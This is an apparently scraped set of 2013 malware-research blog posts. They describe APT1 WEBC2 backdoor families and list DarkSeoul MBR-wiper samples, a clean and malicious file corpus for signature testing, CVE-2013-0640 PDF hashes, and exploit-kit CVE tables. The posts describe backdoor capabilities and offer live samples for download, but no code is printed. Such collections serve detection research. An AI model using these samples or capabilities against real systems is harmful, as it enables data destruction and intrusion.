www.bo2k.com. It also contains the hard disk identification code found at www.winsim.com/diskid32/diskid32.cpp. When the WARP executing remote commands, the malware creates a copy of the ?%SYSTEMROOT%\system32\cmd.exe? file as '%USERPROFILE%\Temp\~ISUN32.EXE'. The version signature information of the duplicate executable is zeroed out. Some WARP variants maintain persistence through the use of DLL search order hijacking. no sample 29 WEBC2-ADSPACE A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. This family of malware is capable of downloading and executing a file. All variants represented here are the same file with different MD5 signatures. This malware attempts to contact its C2 once a week (Thursday at 10:00 AM). It looks for commands inside a set of HTML tags, part of which are in the File Strings indicator term below. > WEBC2-ADSPACE_sample_AB00B38179851C8AA3F9BC80ED7BAA23 30. WEBC2-AUSOV A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. This malware family is a only a downloader which operates over the HTTP protocol with a hard-coded URL. If directed, it has the capability to download, decompress, and execute compressed binaries. > WEBC2-AUSOV_sample_6E442C5EF460BEE4C9457C6BF7A132D6 > WEBC2-AUSOV_sample_097B5ABB53A3D84FA9EABDA02FEF9E91 > WEBC2-AUSOV_sample_A40E20FF8B991308F508239625F275D8 > WEBC2-AUSOV_sample_D262CB8267BEB0E218F6D11D6AF9052E 31 WEBC2-BOLID A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. This family of malware is a backdoor capable of downloading files and updating its configuration. Communication with the command and control (C2) server uses a combination of single-byte XOR and Base64 encoded data wrapped in standard HTML tags. The malware family installs a registry key as a persistence mechanism. > WEBC2-BOLID_sample_1EA61A0945BDE3C6F41E12BC01928D37 > WEBC2-BOLID_sample_5FF3269FACA4A67D1A4C537154AAAD4B > WEBC2-BOLID_sample_53B263DD41838AA178A5CED338A207F3 > WEBC2-BOLID_sample_9675827A495F4BA6A4EFD4DD70932B7C > WEBC2-BOLID_sample_D8238E950608E5ABA3D3E9E83E9EE2CC 32. WEBC2-CLOVER A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The family of malware provides the attacker with an interactive command shell, the ability to upload and download files, execute commands on the system, list processes and DLLs, kill processes, and ping hosts on the local network. Responses to these commands are encrypted and compressed before being POSTed to the server. Some variants copy cmd.exe to Updatasched.exe in a temporary directory, and then may launch that in a process if an interactive shell is called. On initial invocation, the malware also attempts to delete previous copies of the Updatasched.exe file. > WEBC2-CLOVER_sample_2FCCAA39533DE02490B1C6395878DD79 > WEBC2-CLOVER_sample_29C691978AF80DC23C4DF96B5F6076BB > WEBC2-CLOVER_sample_065E63AFDFA539727F63AF7530B22D2F 33. WEBC2-CSON A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. Members of this family of malware act only as downloaders and droppers for other malware. They communicate with a hard-coded C2 server, reading commands embedded in HTML comment fields. Some variants are executables which act upon execution, others are DLLs which can be attached to services or loaded through search order hijacking. > WEBC2-CSON_sample_7D3140BD028F70F1FA865364B69C5999 > WEBC2-CSON_sample_50F35B7C86AEDE891A72FCB85F06B0B7 > WEBC2-CSON_sample_73D125F84503BD87F8142CF2BA8AB05E > WEBC2-CSON_sample_575836EBB1B8849F04E994E9160370E4 > WEBC2-CSON_sample_4192479B055B2B21CB7E6C803B765D34 > WEBC2-CSON_sample_277964807A66AEEB6BD81DBFCAA3E4E6 > WEBC2-CSON_sample_A38A367D6696BA90B2E778A5A4BF98FD > WEBC2-CSON_sample_D22863C5E6F098A4B52688B021BEEF0A > WEBC2-CSON_sample_F1E5D9BF7705B4DC5BE0B8A90B73A863 > WEBC2-CSON_sample_F802B6E448C054C9C16B97FF85646825 34. WEBC2-DIV The WEBC2 malware family is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The WEBC2-DIV variant searches for the strings "div safe:" and " balance" to delimit encoded C2 information. If the decoded string begins with the letter "J" the malware will parse additional arguments in the decoded string to specify the sleep interval to use. WEBC2-DIV is capable of downloading a file, downloading and executing a file, or sleeping a specified interval. > WEBC2-DIV_sample_1E5EC6C06E4F6BB958DCBB9FC636009D 35 WEBC2-GREENCAT A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. This malware is a variant on the GREENCAT family, using a fixed web C2. This family is a full featured backdoor which provides remote command execution, file transfer, process and service enumeration and manipulation. It installs itself persistently through the current user's registry Run key. > WEBC2-GREENCAT_sample_1CE4605E771A04E375E0D1083F183E8E > WEBC2-GREENCAT_sample_36C0D3F109AEDE4D76B05431F8A64F9E > WEBC2-GREENCAT_sample_55FB1409170C91740359D1D96364F17B > WEBC2-GREENCAT_sample_BA0C4D3DBF07D407211B5828405A9B91 > WEBC2-GREENCAT_sample_E54CE5F0112C9FDFE86DB17E85A5E2C5 > WEBC2-GREENCAT_sample_E83F60FB0E0396EA309FAF0AED64E53F 36. WEBC2-HEAD The WEBC2 malware family is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The WEBC2-HEAD variant communicates over HTTPS, using the system's SSL implementation to encrypt all communications with the C2 server. WEBC2-HEAD first issues an HTTP GET to the host, sending the Base64-encoded string containing the name of the compromised machine running the malware. > WEBC2-HEAD_sample_7B42B35832855AB4FF37AE9B8FA9E571 > WEBC2-HEAD_sample_88C7C50CD4130561D57A1D3B82C5B953 > WEBC2-HEAD_sample_165EF79E7CAA806F13F82CC2BBF3DEDD > WEBC2-HEAD_sample_649D54BC9EEF5A60A4B9D8B889FEE139 > WEBC2-HEAD_sample_973F4A238D6D19BDC7B42977B07B9CEF > WEBC2-HEAD_sample_B74022A7B9B63FDC541AE0848B28A962 > WEBC2-HEAD_sample_C4C638750526E28F68D6D71FD1266BDF > WEBC2-HEAD_sample_C9172B3E83C782BC930C06B628F31FA5 > WEBC2-HEAD_sample_EC8C89AA5E521572C74E2DD02A4DAF78 > WEBC2-HEAD_sample_F627990BBE2EC5C48C180F724490C332 37 WEBC2-KT3 The WEBC2 malware family is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The WEBC2-KT3 variant searches for commands in a specific comment tag. Network traffic starting with *!Kt3+v| may indicate WEBC2-KT3 activity. > WEBC2-KT3_sample_EC3A2197CA6B63EE1454D99A6AE145AB 38 WEBC2-QBP The WEBC2 malware family is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The WEBC2-QBP variant will search for two strings in a HTML comment. The first will be "2010QBP " followed by " 2010QBP//--". Inside these tags will be a DES-encrypted string. > WEBC2-QBP_sample_929802A27737CEBC59D19DA724FDF30A > WEBC2-QBP_sample_C04C796EF126AD7429BE7D55720FE392 > WEBC2-QBP_sample_CF9C2D5A8FBDD1C5ADC20CFC5E663C21 39 WEBC2-RAVE A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. This family of malware will set itself up as a service and connect out to a hardcoded web page and read a modified base64 string from this webpage. The later versions of this malware supports three commands (earlier ones are just downloaders or reverse shells). The first commands will sleep the malware for N number of hours. The second command will download a binary from the encoded HTML comment and execute it on the infected host. The third will spawn an encoded reverse shell to an attacker specified location and port. > WEBC2-RAVE_sample_5BCAA2F4BC7567F6FFD5507A161E221A > WEBC2-RAVE_sample_9F11BC08AF048C5C3A110E567082FE0B > WEBC2-RAVE_sample_438983192903F3FECF77500A39459EE6 > WEBC2-RAVE_sample_A2534E9B7E4146368EA3245381830EB0 > WEBC2-RAVE_sample_BDD2AD4C0E1E5667D117810AE9E36C4B > WEBC2-RAVE_sample_BF0EE4367EA32F8E3B911C304258E439 40. WEBC2-TABLE The WEBC2 malware family is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The WEBC2-TABLE variant looks for web pages containing 'background', 'align', and 'bgcolor' tags to be present in the requested Web page. If the data in these tags are formatted correctly, the malware will decode a second URL and a filename. This URL is then retrieved, written to the decoded filename and executed. > WEBC2-TABLE_sample_7A7A46E8FBC25A624D58E897DEE04FFA 41 WEBC2-TOCK The WEBC2 malware family is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The WEBC2-TOCK variant looks for tags which include the name of the system in them as a parameter. If those tags are formed correctly, the malware will decode the payload URL from the web page, then download and execute the payload. no samples 42. WEBC2-UGX A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. Members of this family of malware provide remote command shell and remote file download and execution capabilities. The malware downloads a web page containing a crafted HTML comment that subsequently contains an encoded command. The contents of this command tell the malware whether to download and execute a program, launch a reverse shell to a specific host and port number, or to sleep for a period of time. > WEBC2-UGX_sample_4B19A2A6D40A5825E868C6EF25AE445E > WEBC2-UGX_sample_54D5D171A482278CC8EACF08D9175FD7 > WEBC2-UGX_sample_56DE2854EF64D869B5DF7AF5E4EFFE3E > WEBC2-UGX_sample_75DAD1CCABAE8ADEB5BAE899D0C630F8 > WEBC2-UGX_sample_8462A62F13F92C34E4B89A7D13A185AD 43. WEBC2-Y21K A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. Members of this family of backdoor malware talk to specific Web-based Command & Control (C2) servers. The backdoor has a limited command set, depending on version. It is primarily a downloader, but it classified as a backdoor because it can accept a limited command set, including changing local directories, downloading and executing additional files, sleeping, and connecting to a specific IP & port not initially included in the instruction set for the malware. Each version of the malware has at least one hardcoded URL to which it connects to receive its initial commands. This family of malware installs itself as a service, with the malware either being the executable run by the service, or the service DLL loaded by a legitimate service. The same core code is seen recompiled on different dates or with different names, but the same functionality. Key signatures include a specific set of functions (some of which can be used with the OS-provided rundll32.exe tool to install the malware as a service), and hardcoded strings used in communication with C2 servers to issue commands to the implant. > WEBC2-Y21K_sample_4CABFAEF26FD8E5AEC01D0C4B90A32F3 > WEBC2-Y21K_sample_225E33508861984DD2A774760BFDFC52 > WEBC2-Y21K_sample_2479A9A50308CB72FCD5E4E18EF06468 44. WEBC2-YAHOO The WEBC2 malware family is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The WEBC2-YAHOO variant enters a loop where every ten minutes it attempts to download a web page that may contain an encoded URL. The encoded URL will be found in the pages returned inside an attribute named 'sb' or 'ex' within a tag named 'yahoo'. The embedded link can direct the malware to download and execute files. > WEBC2-YAHOO_sample_2B659D71AE168E774FAAF38DB30F4A84 > WEBC2-YAHOO_sample_4C9C9DBF388A8D81D8CFB4D3FC05F8E4 > WEBC2-YAHOO_sample_7A670D13D4D014169C4080328B8FEB86 > WEBC2-YAHOO_sample_36D5C8FC4B14559F73B6136D85B94198 > WEBC2-YAHOO_sample_37DDD3D72EAD03C7518F5D47650C8572 > WEBC2-YAHOO_sample_0149B7BD7218AAB4E257D28469FDDB0D > WEBC2-YAHOO_sample_1415EB8519D13328091CC5C76A624E3D > WEBC2-YAHOO_sample_A8F259BB36E00D124963CFA9B86F502E > WEBC2-YAHOO_sample_AA4F1ECC4D25B33395196B5D51A06790 > WEBC2-YAHOO_sample_CC3A9A7B026BFE0E55FF219FD6AA7D94 > WEBC2-YAHOO_sample_F7F85D7F628CE62D1D8F7B39D8940472 DARKSEOUL - JOKRA - MBR WIPER SAMPLES March 20, 2013, 9:29 pm Next 16,800 clean and 11,960 malicious files for signature testing and research. Previous Mandiant APT1 samples categorized by malware families 0 0 Image may be NSFW. Clik here to view. If all you needed for happiness is to destroy a few virtual machines, here are the samples for today's headline maker. The malware overwrites master boot record (MBR) as described here: * Trojan.Jokra - Symantec * DarkSeoul: SophosLabs identifies malware used in South Korean internet attack * South Korean Banks, Media Companies Targeted by Destructive Malware - McAfee * South Korean Banks and Broadcasting Organizations Suffer Major Damage from Cyber Attack - Symantec. Download Image may be NSFW. Clik here to view.Download. Email me if you need the password Download dc789dee20087c5e1552804492b042cd linux shell script File Information 9263E40D9823AECF9388B64DE34EAE54 DarkSeoulDropper dc789dee20087c5e1552804492b042cd linux shell script 5FCD6E1DACE6B0599429D913850F0364 0A8032CD6B4A710B1771A080FA09FB87 DB4BBDC36A78A8807AD9B15A562515C4 F0E045210E3258DAD91D7B6B4D64E7F3 E4F66C3CD27B97649976F6F0DAAD9032 - (Oct 19, 2012)- older sample 50E03200C3A0BECBF33B3788DAC8CD46 (Aug 30, 2012) - older sample Automatic Scans SHA256:422c767682bee719d85298554af5c59cf7e48cf57daaf1c5bdd87c5d1aab40cc SHA1:bf823cfee2b2072efb7fed11898eb235e2b3c1ed MD5:9263e40d9823aecf9388b64de34eae54 File size:417.5 KB ( 427520 bytes ) File type:Win32 EXE Tags:peexe upx Detection ratio: 14 / 45 Analysis date: 2013-03-21 01:23:59 UTC ( 2 hours, 55 minutes ago ) AhnLab-V3 Dropper/Eraser.427520 20130320 AntiVir TR/KillMBR.Y.2 20130320 Commtouch W32/Warezov.gen2!W32DL 20130320 DrWeb Trojan.KillFiles.10563 20130321 F-Prot W32/Warezov.gen2!W32DL 20130321 Microsoft Trojan:Win32/Dembr.A 20130320 NANO-Antivirus Virus.Win32.Gen.ccmw 20130321 nProtect Trojan/W32.Agent.427520.EJ 20130320 PCTools Trojan.Jokra 20130321 Symantec Trojan.Jokra 20130321 TrendMicro-HouseCall TROJ_GEN.F47V0320 20130321 VBA32 BScope.Trojan.MTA.0161 20130320 ViRobot Dropper.S.Agent.427520.A 20130320 SHA256:239ed753232d3cc0e75323d16d359150937934d30da022628e575997c8dd60a2 SHA1:9f69da40dda6367789041aaff01cf61d562b7c21 MD5:5fcd6e1dace6b0599429d913850f0364 File size:24.0 KB ( 24576 bytes ) File name:239ed753232d3cc0e75323d16d359150937934d30da022628e575997c8dd60a2 File type:Win32 EXE Tags:peexe Detection ratio: 16 / 45 Analysis date: 2013-03-21 00:33:17 UTC ( 3 hours, 48 minutes ago ) AhnLab-V3 Win-Trojan/Agent.24576.JPG 20130320 AntiVir TR/KillMBR.Y.1 20130320 ClamAV Win.Trojan.Agent-257543 20130320 DrWeb Trojan.KillFiles.10563 20130321 Fortinet W32/Pak.ACED1!tr 20130320 Malwarebytes Trojan.MBR.Killer 20130320 McAfee KillMBR-FBIA 20130320 McAfee-GW-Edition Artemis!5FCD6E1DACE6 20130320 NANO-Antivirus Virus.Win32.Gen.ccmw 20130320 nProtect Trojan/W32.Agent.24576.EAO 20130320 PCTools Trojan.Jokra 20130321 Sophos Mal/EncPk-ACE 20130320 Symantec Trojan.Jokra 20130321 TrendMicro TROJ_INJECTO.BDE 20130320 TrendMicro-HouseCall TROJ_INJECTO.BDE 20130321 ViRobot Trojan.Win32.U.KillMBR.24576.A 20130320 16,800 CLEAN AND 11,960 MALICIOUS FILES FOR SIGNATURE TESTING AND RESEARCH. March 23, 2013, 11:02 pm Next CVE-2013-0804 Novell GroupWise 2012 Multiple Untrusted Pointer Dereferences Exploitation by Brian Mariani & Frédéric Bourla Previous DarkSeoul - Jokra - MBR wiper samples 0 0 Image may be NSFW. Clik here to view.Signature and security product testing often requires large numbers of sorted malicious and clean files to eliminate false positives and negatives. They are not always easy to find, but here are some that I have. Clean documents are collected from various open sources. All the copyright rights belong the the authors of each document and file. You must not use the documents for their content but only as samples of particular file types. Download all All files use the same password (scheme). Email me if you need the password. Image may be NSFW. Clik here to view.16,800 CLEAN FILES 1. EXE UTILITY FOR CLEAN EXE FILES 2. XLS(X), DOC(X), RTF CLEAN MS OFFICE FILES AND RTF - 2000 FILES 3. ZIP, 7Z, RAR CLEAN ARCHIVE FILES - 5500 FILES 4. JAR CLEAN JAVA FILES - 100 FILES 5. PDF PDF - 9000_files and PDF -100+with embed_3d_video_swf_ js 6. MACH-O CLEAN OSX MACH-O FILES - 50 FILES 7. ELF CLEAN ELF LINUX FILES - 46 FILES Image may be NSFW. Clik here to view. 11,960 MALICIOUS FILES 1. PDF MALWARE PDF NEW -170 FILES MALWARE PDF PRE_04-2011_10982_files 2. RTF, XLS MALWARE RTF_CVE-2010-3333_RTF_92files MALWARE_RTF_CVE-2012-0158_300_files MALWARE_ENCRYPTED_XLS_16files 3. MACH-O MALWARE_MACHO_OSX_100_FILES 4. ELF MALWARE_ELF_LINUX_100_FILES 5. JAR 6. MALWARE JAVA (JAR) - 200 FILES DETAILED LISTING OF CLEAN FILES 1. WINDOWS EXECUTABLES EXE Windows executables. I am not posting any because you can quickly generate your own from any vm. See exe collect utility by Stephan Chenette. https://github.com/IOActive/SearchAndCollect 2. CLEAN MS OFFICE FILES AND RTF - 2,000 FILES DOC, DOCX, XLS, XLSX, RTF RTF - 200_files XLSX -100_files XLS_300_files DOCX_100_files DOC_1300_files 3. CLEAN ARCHIVE FILES - 5,500 FILES 7z, ZIP, RAR Encrypted and not. 7z_w_EXE+DLL_1000_files_nopass RAR_EXE+DLL_1000_files_encryptedname_pass_123qwe RAR_EXE+DLL_1000_files_pass_password123 RAR_OFFICE+PDF_500_files_pass_1234!@#$ ZIP_w_EXE+DLL_1000_files_nopass ZIP_w_EXE+DLL_1000_files_pass_password123 P.S. - please remove _185-1 (86).rar from RAR_OFFICE+PDF_500_files_pass_1234!@#$ as it is not clean, accidental sneak in. It was already removed in the current set. 4. CLEAN JAVA FILES - 100 FILES JAR CLEAN_JAR_100_files 5. CLEAN ADOBE READER FILES - 9,100 FILES PDF PDF - 9000_files PDF -100+__embed_3d_video_swf_ js - clean pdf documents with special features - embedded javascript, 3d objects, flash, video, etc. 6. CLEAN OSX MACH-O FILES - 50 FILES 7. CLEAN ELF LINUX FILES - 46 FILES These 4 files were removed as questionable (perl2elf utility with obfuscated perl code) 0fdb34f48166dae57ff410d723efd3f7 4020b92f05661260f5ed3fe642eb0ace a1faa486be2303697d13d26cca576f27 f7536bb412d6c4573fd6fd819e1b07bb DETAILED LISTING OF MALICIOUS FILES 1. MALWARE ADOBE READER FILES -11,152 FILES PDF PDF-XDP _3files CVE-2013-0640_PDF_21files CVE-2012-0754_PDF_1file CVE-2011-2462_PDF_25files CVE-2010-0188_PDF_49files CVE_2010-2883_PDF_25files MALWARE_PDF_PRE_04-2011_10982_files - files from web exploit packs - older than April 2011. 2. MALWARE MS OFFICE AND RTF FILES - RTF, XLS MALWARE RTF_CVE-2010-3333_RTF_92files MALWARE_RTF_CVE-2012-0158_300_files MALWARE_ENCRYPTED_XLS_16files - CVE-2012-0158 3. MALWARE_MACHO_OSX_100_FILES 4. MALWARE_ELF_LINUX_100_FILES 5. MALWARE JAVA (JAR) - 200 FILES Search RSSing.com -------------------------------------------------------------------------------- CVE-2013-0804 NOVELL GROUPWISE 2012 MULTIPLE UNTRUSTED POINTER DEREFERENCES EXPLOITATION BY BRIAN MARIANI & FRÉDÉRIC BOURLA April 16, 2013, 9:55 pm Next CVE-2013-0640 samples listing Previous 16,800 clean and 11,960 malicious files for signature testing and research. 0 0 Image may be NSFW. Clik here to view. This is another excellent publication by Brian Mariani & Frédéric Bourla (High Tech Bridge) describing their discovery and research of CVE-2013-0804 Novell GroupWise 2012 Multiple Untrusted Pointer Dereferences Exploitation CVE-2013-0804 The client in Novell GroupWise 8.0 before 8.0.3 HP2 and 2012 before SP1 HP1 allows remote attackers to execute arbitrary code or cause a denial of service (incorrect pointer dereference) via unspecified vectors. You can download it from here: High Tech Bridge Novell GroupWise 2012 Multiple Untrusted Pointer Dereferences Exploitation by Brian Mariani & Frédéric Bourla CVE-2013-0640 SAMPLES LISTING April 23, 2013, 9:42 pm Next An Overview of Exploit Packs (Update 19.1) April 2013 Previous CVE-2013-0804 Novell GroupWise 2012 Multiple Untrusted Pointer Dereferences Exploitation by Brian Mariani & Frédéric Bourla 0 0 Image may be NSFW. Clik here to view.This is a detailed MD5 listing of CVE-2013-0640 pdf files that were posted earlier. I got a few requests for samples that were already posted as a pack in this post ( 16,800 clean and 11,960 malicious files for signature testing and research.) Now you can see them in all their glory below. I can post listings for other malware from that large post if there is need and interest. Image may be NSFW. Clik here to view.PDF MALWARE PDF NEW -170 FILES MALWARE PDF PRE_04-2011_10982_files * Vinsula. CVE-2013-0640 – Further Investigation into an Adobe PDF Zero-day Malware Attack * Kaspersky: The MiniDuke Mystery: PDF 0-day Government Spy Assembler 0x29A Micro Backdoor 0CDF55626E56FFBF1B198BEB4F6ED559 report.pdf2 151ADD98EEC006F532C635EA3FC205CE action_plan.pdf_ 2A42BF17393C3CAAA663A6D1DADE9C93 Mandiant.pdf_ 3119ABBA449D16355CEB385FD778B525 mousikomi.pdf_ 3668B018B4BB080D1875AEE346E3650A action_plan.pdf_ 37A9C45B78F4DEE9DA8FD8019F66005A sample.pdf_ 3F301758AA3D5D123A9DDBAD1890853B EUAG_report.pdf_ 6945E1FBEF586468A6D4F0C4F184AF8B report.pdf_ 7005E9EE9F673EDAD5130B3341BF5E5F 2013-Yilliq Noruz Bayram Merikisige Teklip.pdf_ 701E3F3973E8A8A7FCEC5F8902ECBFD9 701E3F3973E8A8A7FCEC5F8902ECBFD9 88292D7181514FDA5390292D73DA28D4 ASEM_Seminar.pdf_ 8E3B08A46502C5C4C45D3E47CEB38D5A cc08_v143.pdf_ 9C572606A22A756A1FCC76924570E92A pdf.pdf_ A7C89D433F737B3FDC45B9FFBC947C4D A7C89D433F737B3FDC45B9FFBC947C4D AD668992E15806812DD9A1514CFC065B arp.pdf_ AE52908370DCDF6C150B6E2AD3D8B11B AE52908370DCDF6C150B6E2AD3D8B11B AF061F8C63CD1D4AD83DC2BF81F36AF8 readme.pdf_ C03BCB0CDE62B3F45B4D772AB635E2B0 The 2013 Armenian Economic Association.pdf_ D00E4AC94F1E4FF67E0E0DFCF900C1A8 ???.pdf_ EF90F2927421D61875751A7FE3C7A131 action_plan.pdf3 F3B9663A01A73C5ECA9D6B2A0519049E Visaform Turkey.pdf_ AN OVERVIEW OF EXPLOIT PACKS (UPDATE 19.1) APRIL 2013 April 27, 2013, 10:00 pm Next DeepEnd Research - Library of Malware Traffic Patterns Previous CVE-2013-0640 samples listing 0 0 Image may be NSFW. Clik here to view. The Explot Pack Table has been updated and you can view it here. Exploit Pack Table Update 19.1 - View or Download from Google Apps If you keep track of exploit packs and can/wish to contribute and be able to make changes, please contact me (see email in my profile) I want to thank L0NGC47, Fibon, and Kafeine, Francois Paget, Eric Romang, and other researchers who sent information for their help. Update April 28, 2013 - added CVE-2013-2423 (Released April 17, 2013) to several packs. Now the following packs serve the latest Java exploit (update your Java!) 1. Styx 2. Sweet Orange 3. Neutrino 4. Sakura 5. Whitehole 6. Cool 7. Safe Pack 8. Crime Boss 9. CritX Other changes Updated: 1. Whitehole 2. Redkit 3. Nuclear 4. Sakura 5. Cool Pack 6. Blackhole 7. Gong Da Added: 1. KaiXin 2. Sibhost 3. Popads 4. Alpha Pack 5. Safe Pack 6. Serenity 7. SPL Pack There are 5 tabs in the bottom of the sheet 1. 2011-2013 2. References 3. 2011 and older 4. List of exploit kits 5. V. 16 with older credits Image may be NSFW. Clik here to view. March 2013 The Explot Pack Table, which has been just updated, has migrated to Google Apps - the link is below. The new format will allow easier viewing and access for those who volunteered their time to keep it up to date. In particular, I want to thank L0NGC47, Fibon, and Kafeine for their help. There are 5 tabs in the bottom of the sheet 1. 2011-2013 2. References 3. 2011 and older 4. List of exploit kits 5. V. 16 with older credits The updates include 1. Neutrino - new 2. Cool Pack - update 3. Sweet Orange - update 4. SofosFO aka Stamp EK - new 5. Styx 2.0 - new 6. Impact - new 7. CritXPack - new 8. Gong Da - update 9. Redkit - update 10. Whitehole - new 11. Red Dot - new Image may be NSFW. Clik here to view.The long overdue Exploit pack table Update 17 is finally here. It got a colorful facelift and has newer packs (Dec. 2011-today) on a separate sheet for easier reading. Updates / new entries for the following 13 packs have been added (see exploit listing below) 1. Redkit 2. Neo Sploit 3. Cool Pack 4. Black hole 2.0 5. Black hole 1.2.5 6. Private no name 7. Nuclear 2.2 (Update to 2.0 - actual v. # is unknown) 8. Nuclear 2.1 (Update to 2.0 - actual v. # is unknown) 9. CrimeBoss 10. Grandsoft 11. Sweet Orange 1.1 Update to 1.0 actual v. # is unknown) 12. Sweet Orange 1.0 13. Phoenix 3.1.15 14. NucSoft 15. Sakura 1.1 (Update to 1.0 actual v. # is unknown) 16. AssocAID (unconfirmed) The full table in xls format - Version 17 can be downloaded from here. Image may be NSFW. Clik here to view. Exploit lists for the added/updated packs AssocAID (unconfirmed) 09-'12 CVE-2011-3106 CVE-2012-1876 CVE-2012-1880 CVE-2012-3683 Unknown CVE 5 Redkit 08-'12 CVE-2010-0188 CVE-2012-0507 CVE-2012-4681 3 Neo Sploit 09-'12 CVE-2012-1723 CVE-2012-4681 2? Cool 08-'12 CVE-2006-0003 CVE-2010-0188 CVE-2011-3402 CVE-2012-0507 CVE-2012-1723 CVE-2012-4681 5 Black hole 2.0 09-'12 CVE-2006-0003 CVE-2010-0188 CVE-2012-0507 CVE-2012-1723 CVE-2012-4681 CVE-2012-4969 promised 5 Black hole 1.2.5 08-'12 CVE-2006-0003 CVE-2007-5659 /2008-0655 CVE-2008-2992 CVE-2009-0927 CVE-2010-0188 CVE-2010-1885 CVE-2011-0559 CVE-2011-2110 CVE-2012-1723 CVE-2012-1889 CVE-2012-4681 11 Private no name 09-'12 CVE-2010-0188 CVE-2012-1723 CVE-2012-4681 3 Nuclear 2.2 (Update to 2.0 - actual v. # is unknown) 03-'12 CVE-2010-0188 CVE-2011-3544 CVE-2012-1723 CVE-2012-4681 4 Nuclear 2.1 (Update to 2.0 - actual v. # is unknown) 03-'12 CVE-2010-0188 CVE-2011-3544 CVE-2012-1723 3 CrimeBoss 09-'12 Java Signed Applet CVE-2011-3544 CVE-2012-4681 3 Grandsoft 09-'12 CVE-2010-0188 CVE-2011-3544 2? Sweet Orange 1.1 09-'12 CVE-2006-0003 CVE-2010-0188 CVE-2011-3544 CVE-2012-4681 4? Sweet Orange 1.0 05-'12 CVE-2006-0003 CVE-2010-0188 CVE-2011-3544 3? Phoenix 3.1.15 05-'12 CVE-2010-0842 CVE: 2010-0248 CVE-2011-2110 CVE-2011-2140 CVE: 2011-2371 CVE-2011-3544 CVE-2011-3659 Firefox social CVE: 2012-0500 CVE-2012-0507 CVE-2012-0779 11 NucSoft 2012 CVE-2010-0188 CVE-2012-0507 2 Sakura 1.1 08-'12 CVE-2006-0003 CVE-2010-0806 CVE-2010-0842 CVE-2011-3544 CVE-2012-4681 5 Version 16. April 2, 2012 Image may be NSFW. Clik here to view. Thanks to Kahu security for Wild Wild West graphic The full table in xls format - Version 16 can be downloaded from here. ADDITIONS AND CHANGES: 1. Blackhole Exploit Kit 1.2.3 Added: 1. CVE-2011-0559 - Flash memory corruption via F-Secure 2. CVE-2012-0507 - Java Atomic via Krebs on Security 3. CVE-2011-3544 - Java Rhino via Krebs on Security 2. Eleonore Exploit Kit 1.8.91 and above- via Kahu Security Added: 1. CVE-2012-0507 - Java Atomic- after1.8.91was released 2. CVE-2011-3544 - Java Rhino 3. CVE-2011-3521 - Java Upd.27 see Timo Hirvonen, Contagio, Kahu Security and Michael 'mihi' Schierl 4. CVE-2011-2462 - Adobe PDF U3D > Also includes > "Flash pack" (presumably the same as before) > "Quicktime" - CVE-2010-1818 ? Image may be NSFW. Clik here to view.3. Incognito Exploit Packv.2 and above there are rumors that Incognito development stopped after v.2 in 2011 and it is a different pack now. If you know, please send links or files. Added after v.2 was released: 1. CVE-2012-0507 - Java Atomic See V.2 analysisvia StopMalvertizing 4. Phoenix Exploit Kit v3.1 - via Malware Don't Need Coffee Added: 1. CVE-2012-0507 - Java Atomic 2. CVE-2011-3544 - Java Rhino + Java TC (in one file) 5. Nuclear Pack v.2 - via TrustWave Spiderlabs Image may be NSFW. Clik here to view. 1. CVE-2011-3544 Oracle Java Rhino 2. CVE-2010-0840 JRE Trusted Method Chaining 3. CVE-2010-0188 Acrobat Reader – LibTIFF 4. CVE-2006-0003 MDAC 6. Sakura Exploit Pack > v.1 via DaMaGeLaB 1. CVE-2011-3544 - Java Rhino (It was in Exploitpack table v15, listing it to show all packs with this exploit) 7. Chinese Zhi Zhu Pack via Kahu Security and Francois Paget (McAfee) 1. CVE-2012-0003 - WMP MIDI 2. CVE-2011-1255 - IE Time Element Memory Corruption 3. CVE-2011-2140 - Flash 10.3.183.x 4. CVE-2011-2110 - Flash 10.3.181.x 5. CVE-2010-0806 - IEPeers 8. Gong Da Pack via Kahu Security 1. CVE-2011-2140 - Flash 10.3.183.x 2. CVE-2012-0003 - WMP MIDI 3. CVE-2011-3544 - Java Rhino 9. Dragon Pack - via DaMaGeLab December 2010 - it is old, listing for curiosity sake Image may be NSFW. Clik here to view. 1. CVE-2010-0886 - Java SMB 2. CVE-2010-0840 - JRE Trusted Method Chaining 3. CVE-2008-2463 - Snapshot 4. CVE-2010-0806 - IEPeers 5. CVE-2007-5659/2008-0655 - Collab.collectEmailInfo 6. CVE-2008-2992 - util.printf 7. CVE-2009-0927 - getIco 8. CVE-2009-4324 - newPlayer Version 15. January 28, 2012 Additions - with many thanks to Kahu Security Hierarchy 